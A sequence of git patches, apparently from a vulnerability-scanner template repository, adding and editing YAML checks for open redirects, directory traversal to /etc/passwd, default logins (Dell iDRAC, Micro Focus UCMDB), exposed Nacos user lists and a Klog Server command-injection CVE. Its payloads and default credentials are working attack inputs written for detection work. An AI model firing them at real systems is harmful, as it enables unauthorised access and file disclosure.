Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 01:16:45 +0530 Subject: [PATCH 033/370] Update open-redirect.yaml --- vulnerabilities/generic/open-redirect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index a1c0961a85..74cb0945be 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -20,7 +20,6 @@ requests: - '{{BaseURL}}//example.com/..;/css' - '{{BaseURL}}/example%E3%80%82com' - '{{BaseURL}}/%5Cexample.com' - - '{{BaseURL}}example.com' - '{{BaseURL}}/example.com' - '{{BaseURL}}\example.com' - '{{BaseURL}}//example.com/' From 81e6c97c65bedf1347013ec6a3139109fd0ce264 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 04:01:38 +0530 Subject: [PATCH 034/370] Adding templates for dell-idrac --- .../dell/dell-idrac-default-login.yaml | 24 +++++++++++ technologies/dell-idrac-detect.yaml | 42 +++++++++++++++++++ workflows/dell-idrac-workflow.yaml | 11 +++++ 3 files changed, 77 insertions(+) create mode 100644 default-logins/dell/dell-idrac-default-login.yaml create mode 100644 technologies/dell-idrac-detect.yaml create mode 100644 workflows/dell-idrac-workflow.yaml diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml new file mode 100644 index 0000000000..05cd6e1cb6 --- /dev/null +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -0,0 +1,24 @@ +id: dell-idrac-default-login +info: + name: dell-idrac-default-login + author: kophjager007 + severity: high + tags: dell,idrac,dlogin + +requests: + - method: POST + cookie-reuse: true + path: + - "{{BaseURL}}/data/login" + body: "user=root&password=calvin" + headers: + Host: "{{Hostname}}" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + Content-Type: application/x-www-form-urlencode + Referer: "{{BaseURL}}/login.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell-idrac-detect.yaml new file mode 100644 index 0000000000..31618b85bf --- /dev/null +++ b/technologies/dell-idrac-detect.yaml @@ -0,0 +1,42 @@ +id: dell-idrac-detect +info: + name: Detect Dell iDRAC + author: kophjager007 + description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info + +requests: + - method: GET + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + path: + - "{{BaseURL}}/sysmgmt/2015/bmc/info" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + condition: and + words: + - "iDRACName" + - "BuildVersion" + + extractors: + - type: regex + part: header + regex: + - iDRAC/[0-9]{1,2} + - type: regex + part: body + regex: + - iDRAC[0-9]{1,2} + - type: regex + part: body + name: fwver + group: 1 + regex: + - '"FwVer" *: *"([^"]+)"' \ No newline at end of file diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml new file mode 100644 index 0000000000..fef179d8a6 --- /dev/null +++ b/workflows/dell-idrac-workflow.yaml @@ -0,0 +1,11 @@ +id: dell-idrac-workflow +info: + name: Dell iDRAC Security Checks + author: kophjager007 + description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. + tags: workflow + +workflows: + - template: technologies/dell-idrac-detect.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml \ No newline at end of file From 82fa1598cf3ccec4bd7483cdcead964e983a1c55 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 00:47:11 +0000 Subject: [PATCH 035/370] Update unauthenticated-airflow.yaml --- misconfiguration/unauthenticated-airflow.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/misconfiguration/unauthenticated-airflow.yaml b/misconfiguration/unauthenticated-airflow.yaml index 4db232a58f..1c14b4f895 100644 --- a/misconfiguration/unauthenticated-airflow.yaml +++ b/misconfiguration/unauthenticated-airflow.yaml @@ -14,9 +14,15 @@ requests: matchers: - type: word words: - - Airflow - DAGs + - "Content-Type: text/html" + part: header + + - type: word + words: + - "Airflow - DAGs" part: body + condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From 1f3b10549000d6b6c3bba10b0de08fe082489d72 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 26 Feb 2021 08:36:34 +0700 Subject: [PATCH 036/370] Update wordpress-user-enumeration.yaml --- vulnerabilities/wordpress/wordpress-user-enumeration.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml index f109bebade..c06644e07a 100644 --- a/vulnerabilities/wordpress/wordpress-user-enumeration.yaml +++ b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml @@ -2,7 +2,7 @@ id: wordpress-user-enumeration info: name: Wordpress user enumeration - author: Manas_Harsh + author: Manas_Harsh & daffainfo severity: info tags: wordpress @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users/" + - "{{BaseURL}}/?rest_route=/wp/v2/users/" matchers-condition: and matchers: - type: status From b05c058a569519e0e17d47fd4df0183dabb5dcd9 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 01:56:25 +0000 Subject: [PATCH 037/370] Update unauthenticated-nacos-access.yaml --- .../unauthenticated-nacos-access.yaml | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index 516f1b6254..f9f82b3b6d 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -1,30 +1,32 @@ id: unauthenticated-nacos-access info: - name: Unauthenticated Nacos access - author: taielab + name: Unauthenticated Nacos access v1.x + author: taielab & @pikpikcu severity: critical - - # References: - # - https://github.com/alibaba/nacos/issues/4593 + issues: https://github.com/alibaba/nacos/issues/4593 requests: - - raw: - - | - GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Nacos-Server - Content-Length: 2 + - method: GET + path: + - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" + - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" matchers-condition: and matchers: + + - type: word + words: + - "Content-Type: application/json" + part: header + - type: regex regex: - '"username":' - '"password":' - - '"totalCount":' - condition: and part: body + condition: and + - type: status status: - 200 From 6908df0aafa19913b9d47be11783ac32191ca9bc Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:08:24 -0300 Subject: [PATCH 038/370] Create joomla-manifest-file.yaml --- exposures/files/joomla-manifest-file.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/files/joomla-manifest-file.yaml diff --git a/exposures/files/joomla-manifest-file.yaml b/exposures/files/joomla-manifest-file.yaml new file mode 100644 index 0000000000..20f6322e99 --- /dev/null +++ b/exposures/files/joomla-manifest-file.yaml @@ -0,0 +1,29 @@ +id: joomla-manifest-file + +info: + name: joomla manifest file disclosure + author: oppsec + severity: low + description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/manifests/files/joomla.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "admin@joomla.org" + - "www.joomla.org" + condition: and + + - type: word + words: + - "application/xml" + part: header + + - type: status + status: + - 200 From 1fbe09c16f69d9226ad2c5c35a65ebc93d2bba03 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Thu, 25 Feb 2021 23:19:22 -0300 Subject: [PATCH 039/370] Create joomla-htaccess.yaml --- exposures/files/joomla-htaccess.yaml | 29 ++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/files/joomla-htaccess.yaml diff --git a/exposures/files/joomla-htaccess.yaml b/exposures/files/joomla-htaccess.yaml new file mode 100644 index 0000000000..4c88101d8e --- /dev/null +++ b/exposures/files/joomla-htaccess.yaml @@ -0,0 +1,29 @@ +id: joomla-htaccess-file + +info: + name: Joomla htacces file disclosure + author: oppsec + severity: info + description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... + +requests: + - method: GET + path: + - "{{BaseURL}}/htaccess.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "# @package Joomla" + - "# @copyright Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.g" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From c6e856fe1b2863cef7af99efb0d7bcee279dc0f1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 03:30:51 +0000 Subject: [PATCH 040/370] Update directory-traversal.yaml --- fuzzing/directory-traversal.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/fuzzing/directory-traversal.yaml b/fuzzing/directory-traversal.yaml index df2f9d7d23..7c44cee4cc 100644 --- a/fuzzing/directory-traversal.yaml +++ b/fuzzing/directory-traversal.yaml @@ -24,6 +24,13 @@ requests: - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" + - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + matchers-condition: and matchers: - type: status From 2731d48192f074797e8c1e58e7d4ec452876b15f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 10:57:35 +0530 Subject: [PATCH 041/370] misc changes --- {exposures/files => miscellaneous}/joomla-htaccess.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposures/files => miscellaneous}/joomla-htaccess.yaml (100%) diff --git a/exposures/files/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml similarity index 100% rename from exposures/files/joomla-htaccess.yaml rename to miscellaneous/joomla-htaccess.yaml From 1ffadb03d5387a166530575e0b9af0bc92b9abd6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 10:58:24 +0530 Subject: [PATCH 042/370] Update joomla-htaccess.yaml --- miscellaneous/joomla-htaccess.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 4c88101d8e..379cb579c1 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -16,7 +16,7 @@ requests: - type: word words: - "# @package Joomla" - - "# @copyright Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.g" + - "Open Source Matters. All rights reserved" condition: and - type: word From f749429a7952f62360d5fb9e40a976df374ec3e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:29:21 +0000 Subject: [PATCH 043/370] Auto Update README [Fri Feb 26 05:29:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 05d10da0c3..e1b43d53ba 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 14 | default-logins | 11 | +| workflows | 21 | miscellaneous | 15 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 606 files**. +**62 directories, 607 files**. From 641b2464555e222678b17ecefd7be000148ba055 Mon Sep 17 00:00:00 2001 From: YashGoti <39102999+YashGoti@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:00:21 +0530 Subject: [PATCH 044/370] Create wp-uploads.yaml --- miscellaneous/wp-uploads.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 miscellaneous/wp-uploads.yaml diff --git a/miscellaneous/wp-uploads.yaml b/miscellaneous/wp-uploads.yaml new file mode 100644 index 0000000000..084e959ee2 --- /dev/null +++ b/miscellaneous/wp-uploads.yaml @@ -0,0 +1,29 @@ +id: wp-uploads + +info: + name: WordPress Upload Directory Listing Enable + author: yashgoti + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/" + - "{{BaseURL}}/wp-content/uploads/2015/" + - "{{BaseURL}}/wp-content/uploads/2016/" + - "{{BaseURL}}/wp-content/uploads/2017/" + - "{{BaseURL}}/wp-content/uploads/2018/" + - "{{BaseURL}}/wp-content/uploads/2019/" + - "{{BaseURL}}/wp-content/uploads/2020/" + - "{{BaseURL}}/wp-content/uploads/2021/" + - "{BaseURL}/wp-content/uploads/cfdb7_uploads/" + matchers: + - type: word + words: + - "Directory listing for" + - "Index of /" + - "[To Parent Directory]" + - "Directory: /" + - type: status + status: + - 200 From fb0116549001cab1ff21948cfed9486e4b5971ca Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:00:36 +0530 Subject: [PATCH 045/370] moving folders around --- {exposures/files => miscellaneous}/joomla-manifest-file.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename {exposures/files => miscellaneous}/joomla-manifest-file.yaml (90%) diff --git a/exposures/files/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml similarity index 90% rename from exposures/files/joomla-manifest-file.yaml rename to miscellaneous/joomla-manifest-file.yaml index 20f6322e99..6195def552 100644 --- a/exposures/files/joomla-manifest-file.yaml +++ b/miscellaneous/joomla-manifest-file.yaml @@ -1,9 +1,9 @@ id: joomla-manifest-file info: - name: joomla manifest file disclosure + name: Joomla manifest file disclosure author: oppsec - severity: low + severity: info description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. requests: From 465ddcec4b54b17a276a0e5f65296a6d9836a06f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:31:32 +0000 Subject: [PATCH 046/370] Auto Update README [Fri Feb 26 05:31:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e1b43d53ba..456c4b8e8a 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 15 | default-logins | 11 | +| workflows | 21 | miscellaneous | 16 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 607 files**. +**62 directories, 608 files**. From 9d0bf90c62284d9cc5401bbe478ce9317bfcfdc3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:04:18 +0530 Subject: [PATCH 047/370] misc changes --- miscellaneous/{wp-uploads.yaml => wp-uploads-listing.yaml} | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename miscellaneous/{wp-uploads.yaml => wp-uploads-listing.yaml} (91%) diff --git a/miscellaneous/wp-uploads.yaml b/miscellaneous/wp-uploads-listing.yaml similarity index 91% rename from miscellaneous/wp-uploads.yaml rename to miscellaneous/wp-uploads-listing.yaml index 084e959ee2..90aa73e290 100644 --- a/miscellaneous/wp-uploads.yaml +++ b/miscellaneous/wp-uploads-listing.yaml @@ -1,4 +1,4 @@ -id: wp-uploads +id: wp-uploads-listing info: name: WordPress Upload Directory Listing Enable @@ -16,7 +16,8 @@ requests: - "{{BaseURL}}/wp-content/uploads/2019/" - "{{BaseURL}}/wp-content/uploads/2020/" - "{{BaseURL}}/wp-content/uploads/2021/" - - "{BaseURL}/wp-content/uploads/cfdb7_uploads/" + + matchers-condition: and matchers: - type: word words: @@ -24,6 +25,7 @@ requests: - "Index of /" - "[To Parent Directory]" - "Directory: /" + - type: status status: - 200 From 00b8f5a12eb5724e23a867f97e0d1261a53f90be Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:36:05 +0000 Subject: [PATCH 048/370] Auto Update README [Fri Feb 26 05:36:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 456c4b8e8a..15f5671301 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 16 | default-logins | 11 | +| workflows | 21 | miscellaneous | 17 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 608 files**. +**62 directories, 609 files**. From 892c25e4d0e280feb9a52dbc0039e5f84cfa4881 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:14:18 +0530 Subject: [PATCH 049/370] Update unauthenticated-nacos-access.yaml --- misconfiguration/unauthenticated-nacos-access.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index f9f82b3b6d..35e0b30cdc 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -11,6 +11,8 @@ requests: path: - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: + User-Agent: Nacos-Server matchers-condition: and matchers: From 36694ceec90adf56c5e5acba7093c8f4d1060bbf Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:21:15 +0530 Subject: [PATCH 050/370] wp workflow update --- .../wordpress/wp-license-file.yaml | 2 +- .../wordpress}/wp-uploads-listing.yaml | 2 +- workflows/wordpress-workflow.yaml | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename miscellaneous/wp-license.yaml => vulnerabilities/wordpress/wp-license-file.yaml (94%) rename {miscellaneous => vulnerabilities/wordpress}/wp-uploads-listing.yaml (93%) diff --git a/miscellaneous/wp-license.yaml b/vulnerabilities/wordpress/wp-license-file.yaml similarity index 94% rename from miscellaneous/wp-license.yaml rename to vulnerabilities/wordpress/wp-license-file.yaml index 35ab078af8..f2ee4bbc05 100644 --- a/miscellaneous/wp-license.yaml +++ b/vulnerabilities/wordpress/wp-license-file.yaml @@ -1,4 +1,4 @@ -id: wp-license +id: wp-license-file info: name: WordPress license file disclosure diff --git a/miscellaneous/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml similarity index 93% rename from miscellaneous/wp-uploads-listing.yaml rename to vulnerabilities/wordpress/wp-uploads-listing.yaml index 90aa73e290..bc2f614fd8 100644 --- a/miscellaneous/wp-uploads-listing.yaml +++ b/vulnerabilities/wordpress/wp-uploads-listing.yaml @@ -16,7 +16,7 @@ requests: - "{{BaseURL}}/wp-content/uploads/2019/" - "{{BaseURL}}/wp-content/uploads/2020/" - "{{BaseURL}}/wp-content/uploads/2021/" - + - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/" matchers-condition: and matchers: - type: word diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 71d5dc5a5e..36be8a7c7b 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -44,3 +44,5 @@ workflows: - template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml - template: vulnerabilities/wordpress/wp-enabled-registration.yaml - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml + - template: vulnerabilities/wordpress/wp-uploads-listing.yaml + - template: vulnerabilities/wordpress/wp-license-file.yaml From 594c657b7d3712b198c9c895c20406a99042e1cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:51:37 +0000 Subject: [PATCH 051/370] Auto Update README [Fri Feb 26 05:51:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 15f5671301..aeee504408 100644 --- a/README.md +++ b/README.md @@ -37,9 +37,9 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 17 | default-logins | 11 | +| workflows | 21 | miscellaneous | 15 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | From 19b0fd818afc59e765ea5ced2d836f817189de94 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Fri, 26 Feb 2021 08:24:16 -0300 Subject: [PATCH 052/370] Update joomla-htaccess.yaml --- miscellaneous/joomla-htaccess.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 379cb579c1..cbaf0cf796 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -1,7 +1,7 @@ id: joomla-htaccess-file info: - name: Joomla htacces file disclosure + name: Joomla htaccess file disclosure author: oppsec severity: info description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... From 65ca8e7a39e0960fe39d25d4da79a269484fea99 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 18:40:25 +0700 Subject: [PATCH 053/370] :fire: Add CVE-2020-35729 --- cves/2020/CVE-2020-35729.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE-2020-35729.yaml diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml new file mode 100644 index 0000000000..f26cd70f4b --- /dev/null +++ b/cves/2020/CVE-2020-35729.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-35729 + +info: + name: Klog Server Unauthenticated Command Injection + author: dwisiswant0 + severity: critical + reference: https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection + description: | + This template exploits an unauthenticated command injection vulnerability + in Klog Server versions 2.4.1 and prior. + + The `authenticate.php` file uses the `user` HTTP POST parameter in a call + to the `shell_exec()` PHP function without appropriate input validation, + allowing arbitrary command execution as the apache user. + + The sudo configuration permits the apache user to execute any command + as root without providing a password, resulting in privileged command + execution as root. + + Originated from Metasploit module, copyright (c) space-r7. + tags: cve,cve2020,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/actions/authenticate.php" + body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' + matchers: + - type: word + words: + - "projectdiscovery.io" \ No newline at end of file From 75df1f3d24723a53185756a16754754564b66e99 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 18:41:58 +0700 Subject: [PATCH 054/370] :pencil2: Add comments --- cves/2020/CVE-2020-35729.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f26cd70f4b..3bf7ab0f43 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -24,8 +24,8 @@ requests: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" - body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' + body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word words: - - "projectdiscovery.io" \ No newline at end of file + - "projectdiscovery.io" # from Base64 decoding payload \ No newline at end of file From 048b46c04868e2ba260027f8826a5dcd87f22c02 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 18:43:32 +0700 Subject: [PATCH 055/370] :pencil2: Update tags --- cves/2020/CVE-2020-35729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index 3bf7ab0f43..1f5ac33847 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -18,7 +18,7 @@ info: execution as root. Originated from Metasploit module, copyright (c) space-r7. - tags: cve,cve2020,apache,rce + tags: cve,cve2020,klog,rce requests: - method: POST From a1a3a8647747501a7ff3de2e86c8f4e8bb15833a Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:02:05 +0700 Subject: [PATCH 056/370] :hammer: Add Micro Focus UCMDB Default Credentials --- ...micro-focus-ucmdb-default-credentials.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml new file mode 100644 index 0000000000..25a7fe3f8e --- /dev/null +++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml @@ -0,0 +1,22 @@ +id: micro-focus-ucmdb-default-credentials + +info: + name: Micro Focus UCMDB Default Credentials + author: dwisiswant0 + severity: high + tags: ucmdb,dlogin + +requests: + - method: POST + path: + - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;" + body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "LWSSO_COOKIE_KEY" + part: header From 13dee2df9f290d80ebfa5c5c69185ae4f878361c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:19:32 +0700 Subject: [PATCH 057/370] :fire: Add CVE-2020-11853 --- cves/2020/CVE-2020-11853.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-11853.yaml diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml new file mode 100644 index 0000000000..5e325fb415 --- /dev/null +++ b/cves/2020/CVE-2020-11853.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-11853 + +info: + name: Micro Focus Operation Bridge Manager RCE + author: dwisiswant0 + severity: high + reference: http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html + description: | + This template supports the detection part only. + + UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, + but this module can probably also be used to exploit Operations Bridge Manager + (containeirized) and Application Performance Management. + + Originated from Metasploit module (#14654). + tags: cve,cve2020,opm,rce + +requests: + - method: GET + path: + - 